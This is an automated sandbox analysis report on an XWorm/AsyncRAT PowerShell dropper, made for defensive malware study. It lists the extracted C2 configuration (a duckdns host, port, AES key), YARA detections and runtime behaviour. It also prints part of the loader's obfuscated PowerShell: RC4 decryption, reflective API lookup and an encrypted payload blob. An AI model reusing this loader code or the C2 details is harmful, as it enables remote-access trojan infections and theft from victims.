Click to jump to signature section
| Source: 00000005.00000002.2514554981.000001DA96AF1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["vbdsg.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"} |
| Source: vbdsg.duckdns.org | Virustotal: Detection: 7% | Perma Link |
| Source: payload.ps1 | Virustotal: Detection: 10% | Perma Link |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack | String decryptor: vbdsg.duckdns.org |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack | String decryptor: 8896 |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack | String decryptor: <123456789> |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack | String decryptor: <Xwormmm> |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack | String decryptor: XWorm V5.2 |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack | String decryptor: USB.exe |
| Source: | Binary string: System.Management.Automation.pdb8 source: powershell.exe, 00000000.00000002.2527484610.0000012503042000.00000004.00000020.00020000.00000000.sdmp |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
| Source: Malware configuration extractor | URLs: vbdsg.duckdns.org |
| Source: powershell.exe, 00000000.00000002.2529225342.0000012505111000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
| Source: powershell.exe, 00000000.00000002.2529225342.0000012505111000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
| Source: payload.ps1 | String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout |
| Source: 5.2.notepad.exe.1da969e0000.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout |
| Source: 5.2.notepad.exe.1da969e0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 5.2.notepad.exe.1da969e0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 5.2.notepad.exe.1da96afce28.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 00000005.00000002.2514490665.000001DA969E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 00000005.00000002.2513903293.000001DA94DF0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
| Source: 00000005.00000002.2513903293.000001DA94DF0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
| Source: 00000000.00000002.2527986841.0000012504B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
| Source: 00000000.00000002.2527986841.0000012504B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
| Source: 00000005.00000002.2514554981.000001DA96AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0000012504B80393 | 0_2_0000012504B80393 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0000012504B8081B | 0_2_0000012504B8081B |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0000012504B7EF13 | 0_2_0000012504B7EF13 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0000012504B7FF5B | 0_2_0000012504B7FF5B |
| Source: C:\Windows\System32\notepad.exe | Code function: 5_2_000001DA94DFB923 | 5_2_000001DA94DFB923 |
| Source: C:\Windows\System32\notepad.exe | Code function: 5_2_000001DA94DFB503 | 5_2_000001DA94DFB503 |
| Source: C:\Windows\System32\notepad.exe | Code function: 5_2_000001DA94DFBD5B | 5_2_000001DA94DFBD5B |
| Source: C:\Windows\System32\notepad.exe | Code function: 5_2_000001DA94DFC1E3 | 5_2_000001DA94DFC1E3 |
| Source: C:\Windows\System32\notepad.exe | Code function: 5_2_000001DA94DFA8DB | 5_2_000001DA94DFA8DB |
| Source: 5.2.notepad.exe.1da969e0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 5.2.notepad.exe.1da969e0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 5.2.notepad.exe.1da96afce28.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 00000005.00000002.2514490665.000001DA969E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 00000005.00000002.2513903293.000001DA94DF0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
| Source: 00000005.00000002.2513903293.000001DA94DF0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
| Source: 00000000.00000002.2527986841.0000012504B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
| Source: 00000000.00000002.2527986841.0000012504B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
| Source: 00000005.00000002.2514554981.000001DA96AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 5.2.notepad.exe.1da969e0000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 5.2.notepad.exe.1da969e0000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 5.2.notepad.exe.1da969e0000.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 5.2.notepad.exe.1da969e0000.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
| Source: 5.2.notepad.exe.1da969e0000.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
| Source: 5.2.notepad.exe.1da96afce28.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
| Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | Jump to behavior |
| Source: C:\Windows\System32\notepad.exe | Mutant created: NULL |
| Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03 |
| Source: C:\Windows\System32\notepad.exe | Mutant created: \Sessions\1\BaseNamedObjects\FEi0RCvFfWeSuiKb |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eilxymg2.ntc.ps1 | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('oRpZbH3ZEcYmiOndt4EPku3n/tG40yWondwPID5d3PRYyOkxl6SSpstvjqJdBkm1zPAX9FuFOtbtD5T2+MA3/Jvsseh6zi+cx7GWLY+XHSvr5i2XOE77Dw0cFfaosB75U0sy3cAg8MRwyoVII3ZM4C4oUXpMV+anb2+WhDJgwPCc/CTuJrEiHeqdAoAwY1adAhyXzdSeENXIIXPqDTw |
Edit tour
powershell.exe (PID: 6580 cmdline: 
conhost.exe (PID: 6720 cmdline: 
notepad.exe (PID: 7592 cmdline: 
